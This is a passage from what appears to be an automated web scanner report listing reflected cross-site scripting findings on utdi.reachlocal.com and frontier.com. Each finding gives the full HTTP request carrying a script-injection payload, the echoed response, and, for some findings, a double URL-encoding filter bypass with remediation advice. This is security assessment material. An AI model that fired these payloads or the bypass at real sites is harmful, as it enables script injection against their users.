Issue detail

The value of the pub_cr_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d338"><script>alert(1)</script>ad1ca6e1bfb was submitted in the pub_cr_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=86687597482d338"><script>alert(1)</script>ad1ca6e1bfb&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:07 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:59 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=86687597482d338"><script>alert(1)</script>ad1ca6e1bfb&rl_track_landing_pages=1" target="RL_top" onClick="javascript:open_popup('/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=23329
...[SNIP]...

2.69. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [rl_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/d837/837045/index5.html

Issue detail

The value of the rl_key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56381"><script>alert(1)</script>70d89b3bb75 was submitted in the rl_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a56381"><script>alert(1)</script>70d89b3bb75&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:56 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:49 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a56381"><script>alert(1)</script>70d89b3bb75&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landin
...[SNIP]...

2.70. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [rl_track_landing_pages parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/d837/837045/index5.html

Issue detail

The value of the rl_track_landing_pages request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a4a6"><script>alert(1)</script>d1455ccc13a was submitted in the rl_track_landing_pages parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=12a4a6"><script>alert(1)</script>d1455ccc13a HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:09 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:01 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
2&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=12a4a6"><script>alert(1)</script>d1455ccc13a" target="RL_top" onClick="javascript:open_popup('/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary
...[SNIP]...

2.71. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [scid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/d837/837045/index5.html

Issue detail

The value of the scid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9d28"><script>alert(1)</script>56378b08b00 was submitted in the scid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d837/837045/index5.html?scid=2323693b9d28"><script>alert(1)</script>56378b08b00&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:50 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:42 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693b9d28"><script>alert(1)</script>56378b08b00&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26i
...[SNIP]...

2.72. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [se_refer parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/d837/837045/index5.html

Issue detail

The value of the se_refer request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 309b3"><script>alert(1)</script>4eadda684d was submitted in the se_refer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice309b3"><script>alert(1)</script>4eadda684d&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:05 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3261
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:57 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice309b3"><script>alert(1)</script>4eadda684d&pub_cr_id=8668759748&rl_track_landing_pages=1" target="RL_top" onClick="javascript:open_popup('/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971
...[SNIP]...

2.73. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [tc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/d837/837045/index5.html

Issue detail

The value of the tc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b54e"><script>alert(1)</script>9fb0f72f32a was submitted in the tc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=110906045201112716b54e"><script>alert(1)</script>9fb0f72f32a&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:54 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:47 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=110906045201112716b54e"><script>alert(1)</script>9fb0f72f32a&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bserv
...[SNIP]...

2.74. http://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /AgentOrdering/CustomAppTabInfo/tabs.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59a54%2527%253balert%25281%2529%252f%252f24407793c50 was submitted in the REST URL parameter 1. This input was echoed as 59a54';alert(1)//24407793c50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /AgentOrdering59a54%2527%253balert%25281%2529%252f%252f24407793c50/CustomAppTabInfo/tabs.css HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43787


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrdering59a54';alert(1)//24407793c50/CustomAppTabInfo/tabs.css');//]]>
...[SNIP]...

2.75. http://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /AgentOrdering/CustomAppTabInfo/tabs.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 760b6%2527%253balert%25281%2529%252f%252f951f3ddd7d3 was submitted in the REST URL parameter 2. This input was echoed as 760b6';alert(1)//951f3ddd7d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /AgentOrdering/CustomAppTabInfo760b6%2527%253balert%25281%2529%252f%252f951f3ddd7d3/tabs.css HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:32:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43787


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrdering/CustomAppTabInfo760b6';alert(1)//951f3ddd7d3/tabs.css');//]]>
...[SNIP]...

2.76. http://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /AgentOrdering/CustomAppTabInfo/tabs.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aeffb%2527%253balert%25281%2529%252f%252f9b1214b2e90 was submitted in the REST URL parameter 3. This input was echoed as aeffb';alert(1)//9b1214b2e90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /AgentOrdering/CustomAppTabInfo/tabs.cssaeffb%2527%253balert%25281%2529%252f%252f9b1214b2e90 HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:32:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43787


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrdering/CustomAppTabInfo/tabs.cssaeffb';alert(1)//9b1214b2e90');//]]>
...[SNIP]...

2.77. http://www.frontier.com/AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e1167 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e1167

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34a38%2527%253balert%25281%2529%252f%252f6b3936757b1 was submitted in the REST URL parameter 1. This input was echoed as 34a38';alert(1)//6b3936757b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e116734a38%2527%253balert%25281%2529%252f%252f6b3936757b1 HTTP/1.1
Host: www.frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8825CMWWI; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=wb3blj55msl0la32go52ws55; CP=null*

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:35:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/AgentOrderingcf4af'-alert(1)-'9ff1a208c26e116734a38';alert(1)//6b3936757b1');//]]>
...[SNIP]...

2.78. http://www.frontier.com/AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e1167 [name of an arbitrarily supplied request parameter]  previous  next

Summary
